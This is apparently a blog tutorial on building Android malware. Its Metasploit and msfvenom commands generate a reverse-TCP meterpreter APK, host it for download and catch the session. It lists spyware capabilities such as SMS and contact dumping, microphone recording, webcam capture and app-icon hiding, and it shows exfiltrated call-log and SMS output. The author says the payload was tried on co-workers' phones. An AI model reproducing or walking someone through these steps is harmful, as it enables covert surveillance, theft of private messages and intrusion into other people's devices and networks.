How to Create Malware for Android Devices

This was an interesting topic that I ran across not too long ago... and seems that the process for generating a meterpreter payload for an android device is very simple. However actually deploying this 'malware' payload to android devices in the wild may be a bit of a different story. Likely it would take plenty of development of the actual meterpreter source code (which is opensource), getting registered on the Google App Store, and then getting past the application vetting they do when you put something out there.. but anyhow that is a topic for another day, so lets get started!

First off we get our metasploit framework console up and running.

Secondly we will setup a multi-pupose exploit handler to catch our Android based reverse TCP meterpreter

msf > use exploit/multi/handler
 msf exploit(handler) > set payload android/meterpreter/reverse_tcp
 payload => android/meterpreter/reverse_tcp
 msf exploit(handler) > set lhost
 lhost =>
 msf exploit(handler) > set lport 4444
 lport => 4444
 msf exploit(handler) > set exitonsession false
 exitonsession => false
 msf exploit(handler) > exploit -j
 [*] Exploit running as background job.

[*] Started reverse TCP handler on
 msf exploit(handler) > [*] Starting the payload handler...

Now we will setup a quick and dirty delivery mechanism to get the Android .apk app from our attacking machine to the Android device. We will do this by simply using our builtin apache server on Kali Linux.

root@nethunterarch:/var/www/html# service apache2 start
 root@nethunterarch:/var/www/html# netstat -ant | grep LISTEN | grep 80
 tcp6       0      0 :::80                   :::*                    LISTEN

Now for our payload... Using the canned / builtin payloads from metasploit we can use 'msfvenom' to generate the app and then just dump the payload into any empty file with a '.apk' file extension.

root@nethunterarch:/var/www/html# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 > myapp.apk
 No platform was selected, choosing Msf::Module::Platform::Android from the payload
 No Arch selected, selecting Arch: dalvik from the payload
 No encoder or badchars specified, outputting raw payload
 Payload size: 8839 bytes

root@nethunterarch:/var/www/html# ls

And that is! you now have an Android application that will execute an Android based meterpreter! pretty simple right ... So now to play around with it a little bit you will need a windows machine with the Android Studio (Available here: installed. The install will take a bit if you already don't already have it, I just did the default install and grabbed some coffee.

After the install is done we will have to get to the 'AVD Manager' - this is the part of Android Studio that manages the virtual android devices. Once we have the AVD Manager up we will be able to launch a wizard to create our first virtual Android device... this process is not complicated and really not in the scope of this post so that part is up to you =)

So after we have our virtual Android device built you simply hit the little play button and it will open the emulator with your device. Once started we just have to get our evil app on the phone. It is important to note that by default the virtual android devices have the security setting for allowing untrusted app installations disabled, an actual Android device in the wild is likely to have this setting enabled by default and will prompt the user to disable the setting before allowing them to install the app.

After the app has been installed on the virtual Android device and started we can catch our meterpreter on our attacking machine

The meterpreter build for android is pretty full featured with lots of tools

meterpreter > help

Core Commands

Command                   Description
 -------                   -----------
 ?                         Help menu
 background                Backgrounds the current session
 bgkill                    Kills a background meterpreter script
 bglist                    Lists running background scripts
 bgrun                     Executes a meterpreter script as a background thread
 channel                   Displays information or control active channels
 close                     Closes a channel
 disable_unicode_encoding  Disables encoding of unicode strings
 enable_unicode_encoding   Enables encoding of unicode strings
 exit                      Terminate the meterpreter session
 get_timeouts              Get the current session timeout values
 help                      Help menu
 info                      Displays information about a Post module
 irb                       Drop into irb scripting mode
 load                      Load one or more meterpreter extensions
 machine_id                Get the MSF ID of the machine attached to the session
 quit                      Terminate the meterpreter session
 read                      Reads data from a channel
 resource                  Run the commands stored in a file
 run                       Executes a meterpreter script or Post module
 sessions                  Quickly switch to another session
 set_timeouts              Set the current session timeout values
 sleep                     Force Meterpreter to go quiet, then re-establish session.
 transport                 Change the current transport mechanism
 use                       Deprecated alias for 'load'
 uuid                      Get the UUID for the current session
 write                     Writes data to a channel

Stdapi: File system Commands

Command       Description
 -------       -----------
 cat           Read the contents of a file to the screen
 cd            Change directory
 checksum      Retrieve the checksum of a file
 cp            Copy source to destination
 dir           List files (alias for ls)
 download      Download a file or directory
 edit          Edit a file
 getlwd        Print local working directory
 getwd         Print working directory
 lcd           Change local working directory
 lpwd          Print local working directory
 ls            List files
 mkdir         Make directory
 mv            Move source to destination
 pwd           Print working directory
 rm            Delete the specified file
 rmdir         Remove directory
 search        Search for files
 upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description
 -------       -----------
 ifconfig      Display interfaces
 ipconfig      Display interfaces
 portfwd       Forward a local port to a remote service
 route         View and modify the routing table

Stdapi: System Commands

Command       Description
 -------       -----------
 execute       Execute a command
 getuid        Get the user that the server is running as
 localtime     Displays the target system's local date and time
 ps            List running processes
 shell         Drop into a system command shell
 sysinfo       Gets information about the remote system, such as OS

Stdapi: Webcam Commands

Command        Description
 -------        -----------
 record_mic     Record audio from the default microphone for X seconds
 webcam_chat    Start a video chat
 webcam_list    List webcams
 webcam_snap    Take a snapshot from the specified webcam
 webcam_stream  Play a video stream from the specified webcam

Android Commands

Command           Description
 -------           -----------
 activity_start    Start an Android activity from a Uri string
 check_root        Check if device is rooted
 dump_calllog      Get call log
 dump_contacts     Get contacts list
 dump_sms          Get sms messages
 geolocate         Get current lat-long using geolocation
 hide_app_icon     Hide the app icon from the launcher
 interval_collect  Manage interval collection capabilities
 send_sms          Sends SMS from target session
 set_audio_mode    Set Ringer Mode
 sqlite_query      Query a SQLite database from storage
 wakelock          Enable/Disable Wakelock
 wlan_geolocate    Get current lat-long using WLAN information

I like the 'check_root' command as I could imagine in a 'real-world' scenario if someone has a rooted phone they are likely going to have many security controls mis-configured on both on the Android device as well as any other system it may come into contact with, which could be a good pivot into a corporate or home network.

As you can see in the shot below our virtual Android device is indeed rooted! I honestly didn't expect this but interesting bit if information to know, also I have ran two other commands 'dump_calllog' and 'dump_sms'.

These two commands were pretty interesting to be as you essentially end up with a massive amount of data from the device (I performed all this on my actual android phone and was surprised how quickly information can be ex filtrated from your device).

root@nethunterarch:~# cat calllog_dump_20170214111302.txt

 [+] Call log dump

Date: 2017-02-14 11:13:02 -0700
 OS: Android 5.1.1 - Linux 3.10.0+ (x86_64)
 Remote IP:
 Remote Port: 7751

 Number    : 6505551212
 Name    : null
 Date    : Tue Feb 14 10:15:28 MST 2017
 Type    : INCOMING
 Duration: 3

root@nethunterarch:~# cat sms_dump_20170214111310.txt

 [+] SMS messages dump

Date: 2017-02-14 11:13:10 -0700
 OS: Android 5.1.1 - Linux 3.10.0+ (x86_64)
 Remote IP:
 Remote Port: 7751

 Type : Incoming
 Date : 2017-02-14 10:15:36
 Address : 6505551212
 Message : Don't forget the marshmallows!

 Type : Outgoing
 Date : 2017-02-14 10:14:26
 Address : (575) 519-9637
 Message : Testing txt

So my next exploration was to see what our canned payload looked like in memory, and turns out that it looks just like any other app on the phone...

somewhat to my disappointment I was unable to get meterpreter to migrate to other PIDs or otherwise get out of this standard application context. That being said I am sure this can be done and the hour or so I was playing around with it is likely not enough time to deduce such a method. The other interesting note is that if the user does a 'Force Stop' the meterpreter session will die... fully expected this behavior but interesting none the less.

And there you have it a quick spitball guide to creating malware for android devices. I have tested this on my own devices as well as some buddies and co-workers and it seems to work on all versions of android up to this point anyhow.